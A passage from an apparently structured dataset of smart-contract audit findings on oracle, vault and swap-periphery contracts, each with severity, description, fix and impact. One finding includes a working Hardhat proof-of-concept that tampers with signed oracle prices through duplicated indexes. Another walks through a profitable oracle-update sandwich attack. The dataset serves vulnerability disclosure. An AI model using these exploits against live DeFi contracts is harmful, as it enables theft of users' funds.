ErrorUtils.getErrorSelectorFromData(reasonBytes);\\n\\n\\n if (OracleUtils.isEmptyPriceError(errorSelector)) {\\n ErrorUtils.revertWithCustomError(reasonBytes);\\n }\\n\\n\\n DepositUtils.cancelDeposit(\\n dataStore,\\n eventEmitter,\\n depositVault,\\n key,\\n msg.sender,\\n startingGas,\\n reason,\\n reasonBytes\\n );\\n }\\n}\\n```\\n\\nNote: This also applies to failed `executeWithdrawal`.",Recommend increasing the minimum required execution fee to account for failed deposit and refund the excess to the user when a deposit succeeds.,Keeper will lose out on execution fee in the event of a failed deposit.,"```\\n _handleDepositError(\\n key,\\n startingGas,\\n reasonBytes\\n );\\n```\\n" +The oracle price could be tampered,medium,"The `_setPrices()` function is missing to check duplicated prices indexes. Attackers such as malicious order keepers can exploit it to tamper signed prices.\\nThe following test script shows how it works\\n```\\nimport { expect } from ""chai"";\\n\\nimport { deployContract } from ""../../utils/deploy"";\\nimport { deployFixture } from ""../../utils/fixture"";\\nimport {\\n TOKEN_ORACLE_TYPES,\\n signPrices,\\n getSignerInfo,\\n getCompactedPrices,\\n getCompactedPriceIndexes,\\n getCompactedDecimals,\\n getCompactedOracleBlockNumbers,\\n getCompactedOracleTimestamps,\\n} from ""../../utils/oracle"";\\nimport { printGasUsage } from ""../../utils/gas"";\\nimport { grantRole } from ""../../utils/role"";\\nimport * as keys from ""../../utils/keys"";\\n\\ndescribe(""AttackOracle"", () => {\\n const { provider } = ethers;\\n\\n let user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9;\\n let roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc;\\n let oracleSalt;\\n\\n beforeEach(async () => {\\n const fixture = await deployFixture();\\n ({ user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9 } = fixture.accounts);\\n\\n ({ roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc } = fixture.contracts);\\n ({ oracleSalt } = fixture.props);\\n });\\n\\n it(""inits"", async () => {\\n expect(await oracle.oracleStore()).to.eq(oracleStore.address);\\n expect(await oracle.SALT()).to.eq(oracleSalt);\\n });\\n\\n it(""tamperPrices"", async () => {\\n const blockNumber = (await provider.getBlock()).number;\\n const blockTimestamp = (await provider.getBlock()).timestamp;\\n await dataStore.setUint(keys.MIN_ORACLE_SIGNERS, 2);\\n const block = await provider.getBlock(blockNumber);\\n\\n let signerInfo = getSignerInfo([0, 1]);\\n let minPrices = [1000, 1000]; // if some signers sign a same price\\n let maxPrices = [1010, 1010]; // if some signers sign a same price\\n let signatures = await signPrices({\\n signers: [signer0, signer1],\\n salt: oracleSalt,\\n minOracleBlockNumber: blockNumber,\\n maxOracleBlockNumber: blockNumber,\\n oracleTimestamp: blockTimestamp,\\n blockHash: block.hash,\\n token: wnt.address,\\n tokenOracleType: TOKEN_ORACLE_TYPES.DEFAULT,\\n precision: 1,\\n minPrices,\\n maxPrices,\\n });\\n\\n // attacker tamper the prices and indexes\\n minPrices[1] = 2000\\n maxPrices[1] = 2020\\n let indexes = getCompactedPriceIndexes([0, 0]) // share the same index\\n\\n await oracle.setPrices(dataStore.address, eventEmitter.address, {\\n priceFeedTokens: [],\\n signerInfo,\\n tokens: [wnt.address],\\n compactedMinOracleBlockNumbers: [blockNumber],\\n compactedMaxOracleBlockNumbers: [blockNumber],\\n compactedOracleTimestamps: [blockTimestamp],\\n compactedDecimals: getCompactedDecimals([1]),\\n compactedMinPrices: getCompactedPrices(minPrices),\\n compactedMinPricesIndexes: indexes,\\n compactedMaxPrices: getCompactedPrices(maxPrices),\\n compactedMaxPricesIndexes: indexes,\\n signatures,\\n });\\n\\n const decimals = 10\\n expect((await oracle.getPrimaryPrice(wnt.address)).min).eq(1500 * decimals);\\n expect((await oracle.getPrimaryPrice(wnt.address)).max).eq(1515 * decimals);\\n });\\n\\n});\\n```\\n\\nThe output\\n```\\n> npx hardhat test .\\test\\oracle\\AttackOracle.ts\\n\\n\\n AttackOracle\\n √ inits\\n √ tamperPrices (105ms)\\n\\n\\n 2 passing (13s)\\n```\\n",Don't allow duplicated prices indexes,Steal funds from the vault and markets.,"```\\nimport { expect } from ""chai"";\\n\\nimport { deployContract } from ""../../utils/deploy"";\\nimport { deployFixture } from ""../../utils/fixture"";\\nimport {\\n TOKEN_ORACLE_TYPES,\\n signPrices,\\n getSignerInfo,\\n getCompactedPrices,\\n getCompactedPriceIndexes,\\n getCompactedDecimals,\\n getCompactedOracleBlockNumbers,\\n getCompactedOracleTimestamps,\\n} from ""../../utils/oracle"";\\nimport { printGasUsage } from ""../../utils/gas"";\\nimport { grantRole } from ""../../utils/role"";\\nimport * as keys from ""../../utils/keys"";\\n\\ndescribe(""AttackOracle"", () => {\\n const { provider } = ethers;\\n\\n let user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9;\\n let roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc;\\n let oracleSalt;\\n\\n beforeEach(async () => {\\n const fixture = await deployFixture();\\n ({ user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9 } = fixture.accounts);\\n\\n ({ roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc } = fixture.contracts);\\n ({ oracleSalt } = fixture.props);\\n });\\n\\n it(""inits"", async () => {\\n expect(await oracle.oracleStore()).to.eq(oracleStore.address);\\n expect(await oracle.SALT()).to.eq(oracleSalt);\\n });\\n\\n it(""tamperPrices"", async () => {\\n const blockNumber = (await provider.getBlock()).number;\\n const blockTimestamp = (await provider.getBlock()).timestamp;\\n await dataStore.setUint(keys.MIN_ORACLE_SIGNERS, 2);\\n const block = await provider.getBlock(blockNumber);\\n\\n let signerInfo = getSignerInfo([0, 1]);\\n let minPrices = [1000, 1000]; // if some signers sign a same price\\n let maxPrices = [1010, 1010]; // if some signers sign a same price\\n let signatures = await signPrices({\\n signers: [signer0, signer1],\\n salt: oracleSalt,\\n minOracleBlockNumber: blockNumber,\\n maxOracleBlockNumber: blockNumber,\\n oracleTimestamp: blockTimestamp,\\n blockHash: block.hash,\\n token: wnt.address,\\n tokenOracleType: TOKEN_ORACLE_TYPES.DEFAULT,\\n precision: 1,\\n minPrices,\\n maxPrices,\\n });\\n\\n // attacker tamper the prices and indexes\\n minPrices[1] = 2000\\n maxPrices[1] = 2020\\n let indexes = getCompactedPriceIndexes([0, 0]) // share the same index\\n\\n await oracle.setPrices(dataStore.address, eventEmitter.address, {\\n priceFeedTokens: [],\\n signerInfo,\\n tokens: [wnt.address],\\n compactedMinOracleBlockNumbers: [blockNumber],\\n compactedMaxOracleBlockNumbers: [blockNumber],\\n compactedOracleTimestamps: [blockTimestamp],\\n compactedDecimals: getCompactedDecimals([1]),\\n compactedMinPrices: getCompactedPrices(minPrices),\\n compactedMinPricesIndexes: indexes,\\n compactedMaxPrices: getCompactedPrices(maxPrices),\\n compactedMaxPricesIndexes: indexes,\\n signatures,\\n });\\n\\n const decimals = 10\\n expect((await oracle.getPrimaryPrice(wnt.address)).min).eq(1500 * decimals);\\n expect((await oracle.getPrimaryPrice(wnt.address)).max).eq(1515 * decimals);\\n });\\n\\n});\\n```\\n" +boundedSub() might fail to return the result that is bounded to prevent overflows,medium,"The goal of `boundedSub()` is to bound the result regardless what the inputs are to prevent overflows/underflows. However, the goal is not achieved for some cases. As a result, `boundedSub()` still might underflow and still might revert. The goal of the function is not achieved.\\nAs a result, the protocol might not be fault-tolerant as it is supposed to be - when `boundedSub()` is designed to not revert in any case, it still might revert. For example, function `MarketUtils.getNextFundingAmountPerSize()` will be affected.\\n`boundedSub()` is designed to always bound its result between `type(int256).min` and `type(int256).max` so that it will never overflow/underflow:\\nIt achieves its goal in three cases:\\nCase 1: `if either a or b is zero or the signs are the same there should not be any overflow`.\\nCase 2: `a > 0`, and `b < 0`, and `a-b > type(int256).max`, then we need to return `type(int256).max`.\\nCase 3: `a < 0`, and `b > 0`, and a - b < `type(int256).min`, then we need to return `type(int256).min`\\nUnfortunately, the third case is implemented wrongly as follows:\\n```\\n // if subtracting `b` from `a` would result in a value less than the min int256 value\\n // then return the min int256 value\\n if (a < 0 && b <= type(int256).min - a) {\\n return type(int256).min;\\n }\\n```\\n\\nwhich essentially is checking a < 0 && b + a <= `type(int256).min`, a wrong condition to check. Because of using this wrong condition, underflow cases will not be detected and the function will revert instead of returning `type(int256).min` in this case.\\nTo verify, suppose a = `type(int256).min` and b = 1, `a-b` needs to be bounded to prevent underflow and the function should have returned `type(int256).min`. However, the function will fail the condition, as a result, it will not execute the if part, and the following final line will be executed instead:\\n```\\nreturn a - b;\\n```\\n\\nAs a result, instead of returning the minimum, the function will revert in the last line due to underflow. This violates the property of the function: it should have returned the bounded result `type(int256).min` and should not have reverted in any case.\\nThe following POC in Remix can show that the following function will revert:\\n```\\nfunction testBoundedSub() public pure returns (int256){\\n return boundedSub(type(int256).min+3, 4);\\n}\\n```\\n","The correction is as follows:\\n```\\n function boundedSub(int256 a, int256 b) internal pure returns (int256) {\\n // if either a or b is zero or the signs are the same there should not be any overflow\\n if (a == 0 || b == 0 || (a > 0 && b > 0) || (a < 0 && b < 0)) {\\n return a // Remove the line below\\n b;\\n }\\n\\n // if adding `// Remove the line below\\nb` to `a` would result in a value greater than the max int256 value\\n // then return the max int256 value\\n if (a > 0 && // Remove the line below\\nb >= type(int256).max // Remove the line below\\n a) {\\n return type(int256).max;\\n }\\n\\n // if subtracting `b` from `a` would result in a value less than the min int256 value\\n // then return the min int256 value\\n// Remove the line below\\n if (a < 0 && b <= type(int256).min // Remove the line below\\n a) {\\n// Add the line below\\n if (a < 0 && a <= type(int256).min // Add the line below\\n b) {\\n return type(int256).min;\\n }\\n\\n return a // Remove the line below\\n b;\\n }\\n```\\n","`boundedSub()` does not guarantee underflow/overflow free as it is designed to be. As a result, the protocol might break at points when it is not supposed to break. For example, function `MarketUtils.getNextFundingAmountPerSize()` will be affected.",```\\n // if subtracting `b` from `a` would result in a value less than the min int256 value\\n // then return the min int256 value\\n if (a < 0 && b <= type(int256).min - a) {\\n return type(int256).min;\\n }\\n```\\n +Adversary can sandwich oracle updates to exploit vault,high,"BLVaultLido added a mechanism to siphon off all wstETH obtained from mismatched pool and oracle prices. This was implemented to fix the problem that the vault could be manipulated to the attackers gain. This mitigation however does not fully address the issue and the same issue is still exploitable by sandwiching oracle update.\\nBLVaultLido.sol#L232-L240\\n```\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n```\\n\\nIn the above lines we can see that the current oracle price is used to calculate the expected amount of wstETH to return to the user. In theory this should prevent the attack but an attacker can side step this sandwiching the oracle update.\\nExample:\\nThe POC is very similar to before except now it's composed of two transactions sandwiching the oracle update. Chainlink oracles have a tolerance threshold of 0.5% before updating so we will use that as our example value. The current price is assumed to be 0.995 wstETH/OHM. The oracle price (which is about to be updated) is currently 1:1\\n```\\nTransaction 1:\\n\\nBalances before attack (0.995:1)\\nLiquidity: 79.8 OHM 80.2 wstETH\\nAdversary: 20 wstETH\\n\\nSwap OHM so that pool price matches pre-update oracle price:\\nLiquidity: 80 OHM 80 wstETH\\nAdversary: -0.2 OHM 20.2 wstETH\\n\\nBalances after adversary has deposited to the pool:\\nLiquidity: 100 OHM 100 wstETH\\nAdversary: -0.2 OHM 0.2 wstETH\\n\\nBalances after adversary sells wstETH for OHM (0.5% movement in price):\\nLiquidity: 99.748 OHM 100.252 wstETH\\nAdversary: 0.052 OHM -0.052 wstETH\\n\\nSandwiched Oracle Update:\\n\\nOracle updates price of wstETH to 0.995 OHM. Since the attacker already sold wstETH to balance \\nthe pool to the post-update price they will be able to withdraw the full amount of wstETH.\\n\\nTransaction 2:\\n\\nBalances after adversary removes their liquidity:\\nLiquidity: 79.798 OHM 80.202 wstETH\\nAdversary: 0.052 OHM 19.998 wstETH\\n\\nBalances after selling profited OHM:\\nLiquidity: 79.849 OHM 80.152 wstETH\\nAdversary: 20.05 wstETH\\n```\\n\\nAs shown above it's still profitable to exploit the vault by sandwiching the oracle updates. With each oracle update the pool can be repeatedly attacked causing large losses.",To prevent this I would recommend locking the user into the vault for some minimum amount of time (i.e. 24 hours),Vault will be attacked repeatedly for large losses,"```\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n```\\n" +minTokenAmounts_ is useless in new configuration and doesn't provide any real slippage protection,high,"BLVaultLido#withdraw skims off extra stETH from the user that results from oracle arb. The problem with this is that minTokenAmounts_ no longer provides any slippage protection because it only ensures that enough is received from the liquidity pool but never enforces how much is received by the user.\\nBLVaultLido.sol#L224-L247\\n```\\n _exitBalancerPool(lpAmount_, minTokenAmounts_);\\n\\n // Calculate OHM and wstETH amounts received\\n uint256 ohmAmountOut = ohm.balanceOf(address(this)) - ohmBefore;\\n uint256 wstethAmountOut = wsteth.balanceOf(address(this)) - wstethBefore;\\n\\n // Calculate oracle expected wstETH received amount\\n // getTknOhmPrice returns the amount of wstETH per 1 OHM based on the oracle price\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n\\n // Burn OHM\\n ohm.increaseAllowance(MINTR(), ohmAmountOut);\\n manager.burnOhmFromVault(ohmAmountOut);\\n\\n // Return wstETH to owner\\n wsteth.safeTransfer(msg.sender, wstethToReturn);\\n```\\n\\nminTokenAmounts_ only applies to the removal of liquidity. Since wstETH is skimmed off to the treasury the user no longer has any way to protect themselves from slippage. As shown in my other submission, oracle slop can lead to loss of funds due to this skimming.",Allow the user to specify the amount of wstETH they receive AFTER the arb is skimmed.,Users cannot protect themselves from oracle slop/wstETH skimming,"```\\n _exitBalancerPool(lpAmount_, minTokenAmounts_);\\n\\n // Calculate OHM and wstETH amounts received\\n uint256 ohmAmountOut = ohm.balanceOf(address(this)) - ohmBefore;\\n uint256 wstethAmountOut = wsteth.balanceOf(address(this)) - wstethBefore;\\n\\n // Calculate oracle expected wstETH received amount\\n // getTknOhmPrice returns the amount of wstETH per 1 OHM based on the oracle price\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n\\n // Burn OHM\\n ohm.increaseAllowance(MINTR(), ohmAmountOut);\\n manager.burnOhmFromVault(ohmAmountOut);\\n\\n // Return wstETH to owner\\n wsteth.safeTransfer(msg.sender, wstethToReturn);\\n```\\n" +Adversary can stake LP directly for the vault then withdraw to break lp accounting in BLVaultManagerLido,high,"The AuraRewardPool allows users to stake directly for other users. In this case the malicious user could stake LP directly for their vault then call withdraw on their vault. This would cause the LP tracking to break on BLVaultManagerLido. The result is that some users would now be permanently trapped because their vault would revert when trying to withdraw.\\nBaseRewardPool.sol#L196-L207\\n```\\nfunction stakeFor(address _for, uint256 _amount)\\n public\\n returns(bool)\\n{\\n _processStake(_amount, _for);\\n\\n //take away from sender\\n stakingToken.safeTransferFrom(msg.sender, address(this), _amount);\\n emit Staked(_for, _amount);\\n \\n return true;\\n}\\n```\\n\\nAuraRewardPool allows users to stake directly for another address with them receiving the staked tokens.\\nBLVaultLido.sol#L218-L224\\n```\\n manager.decreaseTotalLp(lpAmount_);\\n\\n // Unstake from Aura\\n auraRewardPool().withdrawAndUnwrap(lpAmount_, claim_);\\n\\n // Exit Balancer pool\\n _exitBalancerPool(lpAmount_, minTokenAmounts_);\\n```\\n\\nOnce the LP has been stake the adversary can immediately withdraw it from their vault. This calls decreaseTotalLP on BLVaultManagerLido which now permanently break the LP account.\\nBLVaultManagerLido.sol#L277-L280\\n```\\nfunction decreaseTotalLp(uint256 amount_) external override onlyWhileActive onlyVault {\\n if (amount_ > totalLp) revert BLManagerLido_InvalidLpAmount();\\n totalLp -= amount_;\\n}\\n```\\n\\nIf the amount_ is ever greater than totalLP it will cause decreaseTotalLP to revert. By withdrawing LP that was never deposited to a vault, it permanently breaks other users from being able to withdraw.\\nExample: User A deposits wstETH to their vault which yields 50 LP. User B creates a vault then stake 50 LP and withdraws it from his vault. The manager now thinks there is 0 LP in vaults. When User A tries to withdraw their LP it will revert when it calls manger.decreaseTotalLp. User A is now permanently trapped in the vault.",Individual vaults should track how much they have deposited and shouldn't be allowed to withdraw more than deposited.,LP accounting is broken and users are permanently trapped.,"```\\nfunction stakeFor(address _for, uint256 _amount)\\n public\\n returns(bool)\\n{\\n _processStake(_amount, _for);\\n\\n //take away from sender\\n stakingToken.safeTransferFrom(msg.sender, address(this), _amount);\\n emit Staked(_for, _amount);\\n \\n return true;\\n}\\n```\\n" +Users can abuse discrepancies between oracle and true asset price to mint more OHM than needed and profit from it,high,"All chainlink oracles have a deviation threshold between the current price of the asset and the on-chain price for that asset. The more oracles used for determining the price the larger the total discrepancy can be. These can be combined and exploited to mint more OHM than expected and profit.\\nBLVaultLido.sol#L156-L171\\n```\\n uint256 ohmWstethPrice = manager.getOhmTknPrice();\\n uint256 ohmMintAmount = (amount_ * ohmWstethPrice) / _WSTETH_DECIMALS;\\n\\n // Block scope to avoid stack too deep\\n {\\n // Cache OHM-wstETH BPT before\\n uint256 bptBefore = liquidityPool.balanceOf(address(this));\\n\\n // Transfer in wstETH\\n wsteth.safeTransferFrom(msg.sender, address(this), amount_);\\n\\n // Mint OHM\\n manager.mintOhmToVault(ohmMintAmount);\\n\\n // Join Balancer pool\\n _joinBalancerPool(ohmMintAmount, amount_, minLpAmount_);\\n```\\n\\nThe amount of OHM to mint and deposit is determined by the calculated price from the on-chain oracle prices.\\nBLVaultLido.sol#L355-L364\\n```\\n uint256[] memory maxAmountsIn = new uint256[](2);\\n maxAmountsIn[0] = ohmAmount_;\\n maxAmountsIn[1] = wstethAmount_;\\n\\n JoinPoolRequest memory joinPoolRequest = JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, maxAmountsIn, minLpAmount_),\\n fromInternalBalance: false\\n });\\n```\\n\\nTo make the issue worse, _joinBalancerPool use 1 for the join type. This is the EXACT_TOKENS_IN_FOR_BPT_OUT method of joining. What this means is that the join will guaranteed use all input tokens. If the current pool isn't balanced in the same way then the join request will effectively swap one token so that the input tokens match the current pool. Now if the ratio is off then too much OHM will be minted and will effectively traded for wstETH. This allows the user to withdraw at a profit once the oracle has been updated the discrepancy is gone.",The vault needs to have withdraw and/or deposit fees to make attacks like this unprofitable.,Users can always time oracles so that they enter at an advantageous price and the deficit is paid by Olympus with minted OHM,"```\\n uint256 ohmWstethPrice = manager.getOhmTknPrice();\\n uint256 ohmMintAmount = (amount_ * ohmWstethPrice) / _WSTETH_DECIMALS;\\n\\n // Block scope to avoid stack too deep\\n {\\n // Cache OHM-wstETH BPT before\\n uint256 bptBefore = liquidityPool.balanceOf(address(this));\\n\\n // Transfer in wstETH\\n wsteth.safeTransferFrom(msg.sender, address(this), amount_);\\n\\n // Mint OHM\\n manager.mintOhmToVault(ohmMintAmount);\\n\\n // Join Balancer pool\\n _joinBalancerPool(ohmMintAmount, amount_, minLpAmount_);\\n```\\n" +stETH/ETH chainlink oracle has too long of heartbeat and deviation threshold which can cause loss of funds,medium,"getTknOhmPrice uses the stETH/ETH chainlink oracle to calculate the current price of the OHM token. This token valuation is used to determine the amount of stETH to skim from the user resulting from oracle arb. This is problematic since stETH/ETH has a 24 hour heartbeat and a 2% deviation threshold. This deviation in price could easily cause loss of funds to the user.\\nBLVaultManagerLido.sol#L458-L473\\n```\\nfunction getTknOhmPrice() public view override returns (uint256) {\\n // Get stETH per wstETH (18 Decimals)\\n uint256 stethPerWsteth = IWsteth(pairToken).stEthPerToken();\\n\\n // Get ETH per OHM (18 Decimals)\\n uint256 ethPerOhm = _validatePrice(ohmEthPriceFeed.feed, ohmEthPriceFeed.updateThreshold);\\n\\n // Get stETH per ETH (18 Decimals)\\n uint256 stethPerEth = _validatePrice(\\n stethEthPriceFeed.feed,\\n stethEthPriceFeed.updateThreshold\\n );\\n\\n // Calculate wstETH per OHM (18 decimals)\\n return (ethPerOhm * 1e36) / (stethPerWsteth * stethPerEth);\\n}\\n```\\n\\ngetTknOhmPrice uses the stETH/ETH oracle to determine the price which as stated above has a 24 hour hearbeat and 2% deviation threshold, this means that the price can move up to 2% or 24 hours before a price update is triggered. The result is that the on-chain price could be much different than the true stETH price.\\nBLVaultLido.sol#L232-L240\\n```\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n \\n```\\n\\nThis price is used when determining how much stETH to send back to the user. Since the oracle can be up to 2% different from the true price, the user can unfairly lose part of their funds.",Use the stETH/USD oracle instead because it has a 1-hour heartbeat and a 1% deviation threshold.,User will be unfairly penalized due large variance between on-chain price and asset price,"```\\nfunction getTknOhmPrice() public view override returns (uint256) {\\n // Get stETH per wstETH (18 Decimals)\\n uint256 stethPerWsteth = IWsteth(pairToken).stEthPerToken();\\n\\n // Get ETH per OHM (18 Decimals)\\n uint256 ethPerOhm = _validatePrice(ohmEthPriceFeed.feed, ohmEthPriceFeed.updateThreshold);\\n\\n // Get stETH per ETH (18 Decimals)\\n uint256 stethPerEth = _validatePrice(\\n stethEthPriceFeed.feed,\\n stethEthPriceFeed.updateThreshold\\n );\\n\\n // Calculate wstETH per OHM (18 decimals)\\n return (ethPerOhm * 1e36) / (stethPerWsteth * stethPerEth);\\n}\\n```\\n" +Normal users could be inadvertently grieved by the withdrawn ratios check,medium,"The contract check on the withdrawn ratios of OHM and wstETH against the current oracle price could run into grieving naive users by taking any wstETH shifted imbalance as a fee to the treasury even though these users have not gamed the system.\\nHere is a typical scenario, assuming the pool has been initiated with total LP equal to sqrt(100_000 * 1_000) = 10_000. (Note: OHM: $15, wstETH: $1500 with the pool pricing match up with manager.getOhmTknPrice() or manager.getTknOhmPrice(), i.e. 100 OHM to 1 wstETH or 0.01 wstETH to 1 OHM. The pool token balances in each step below may be calculated via the Constant Product Simulation after each swap and stake.)\\n```\\nOHM token balance: 100_000\\nwstETH token balance: 1_000\\nTotal LP: 10_000\\n```\\n\\nA series of swap activities results in the pool shifted more of the LP into wstETH.\\nOHM token balance: 90_909.1 wstETH token balance: 1_100 Total LP: 10_000\\nBob calls `deposit()` by providing 11 wstETH where 1100 OHM is minted with 1100 - 90909.1 * 0.01 = 190.91 unused OHM burned. (Note: Bob successfully stakes with 909.09 OHM and 11 wstETH and proportionately receives 100 LP.)\\nOHM token balance: 91_818.19 wstETH token balance: 1_111 Total LP: 10_100 User's LP: 100\\nBob changes his mind instantly and proceeds to call `withdraw()` to remove all of his LP. He receives the originally staked 909.09 OHM and 11 wstETH. All OHM is burned but he is only entitled to receive 909.09 / 100 = 9.09 wstETH since the system takes any arbs relative to the oracle price for the Treasury and returns the rest to the owner.\\nOHM token balance: 90_909.1 wstETH token balance: 1_100 Total LP: 10_000 User's LP: 0","Consider implementing a snapshot of the entry record of OHM and wstETH and compare that with the proportionate exit record. Slash only the differential for treasury solely on dissuading large attempts to shift the pool around, and in this case it should be 0 wstETH since the originally staked wstETH is no greater than expectedWstethAmountOut.","Bob suffers a loss of 11 - 9.09 = 1.91 wstETH (~ 17.36% loss), and the system is ready to trap the next user given the currently imbalanced pool still shifted more of the LP into wstETH.",```\\nOHM token balance: 100_000\\nwstETH token balance: 1_000\\nTotal LP: 10_000\\n```\\n +Periphery#_swapPTsForTarget won't work correctly if PT is mature but redeem is restricted,medium,"Periphery#_swapPTsForTarget doesn't properly account for mature PTs that have their redemption restricted\\nPeriphery.sol#L531-L551\\n```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n\\nAdapters can have their redeem restricted meaning the even when they are mature they can't be redeemed. In the scenario that it is restricted Periphery#_swapPTsForTarget simply won't work.","Use the same structure as _removeLiquidity:\\n```\\n if (divider.mscale(adapter, maturity) > 0) {\\n if (uint256(Adapter(adapter).level()).redeemRestricted()) {\\n ptBal = _ptBal;\\n } else {\\n // 2. Redeem PTs for Target\\n tBal += divider.redeem(adapter, maturity, _ptBal);\\n }\\n```\\n",Redemption will fail when redeem is restricted because it tries to redeem instead of swapping,"```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n" +sponsorSeries() method fails when user want to swap for stake token using,medium,"`sponsorSeries()` fails when user want to use `swapQuote` to swap for stake token to sponsor a series.\\nstake is token that user need to deposit (technically is pulled) to be able to sponsor a series for a given target. User has option to send `SwapQuote calldata quote` and swap any ERC20 token for stake token. Below is the code that doing transferFrom() of stakeToken not sellToken()\\n```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n\\nExpected behaviour of this function is to pull `sellToken` from msg.sender when `address(quote.sellToken) != stake`. For example- stake token is WETH. User want to swap DAI for WETH in `sponsorSeries()`. In this case, user would be sending SwapQuote.sellToken = DAI and swapQuote.buyToke = WETH and expect that fillQuote() would swap it for WETH. This method will fail because `sellToken` not transferred from msg.sender.",Consider implementation of functionality to transferFrom `sellToken` from msg.sender with actual amount that is require to get exact amountOut greater or equal to `stakeSize`,sponsorSeries() fails when `address(quote.sellToken) != stake`,"```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n" +Refund of protocol fee is being to wrong user,medium,"There is one function, _fillQuote(), which is handling swap from `0x`. Ideally If there is any remaining protocol fee (in ETH) then it will be returned to sender aka msg.sender. There are scenarios when fee can be sent to receiver of swap instead.\\nPeriphery and RollerPeriphery both are using almost identical logic in `_fillQuote()` hence this vulnerability affect both contracts. It exist if qupte.buyToken is ETH and there is any remaining protocol fee.\\nHere are pieces of puzzle\\nAfter swap if buyToken == ETH then store contract ETH balance in `boughtAmount`\\n```\\n// RollerPeriphery.sol\\n boughtAmount = address(quote.buyToken) == ETH ? address(this).balance : quote.buyToken.balanceOf(address(this));\\n```\\n\\nNext it store refundAmt\\n```\\n// RollerPeriphery.sol\\n // Refund any unspent protocol fees (paid in ether) to the sender.\\n uint256 refundAmt = address(this).balance;\\n```\\n\\nCalculate actual refundAmt and transfer to sender\\n```\\n if (address(quote.buyToken) == ETH) refundAmt = refundAmt - boughtAmount;\\n payable(msg.sender).transfer(refundAmt);\\n```\\n\\nThis is clear that due to line 251, 258 and 259, refundAmt is 0. So sender is not getting refund.\\nLater on in logic flow buyToken will be transferred to receiver\\n```\\n address(quote.buyToken) == ETH\\n ? payable(receiver).transfer(amtOut)\\n : ERC20(address(quote.buyToken)).safeTransfer(receiver, amtOut); // transfer bought tokens to receiver\\n```\\n",Consider intercepting refund amount properly when buyToken is ETH or else just handle refund when buyToken is NOT ETH and write some explanation around it.,Sender is not getting protocol fee refund.,```\\n// RollerPeriphery.sol\\n boughtAmount = address(quote.buyToken) == ETH ? 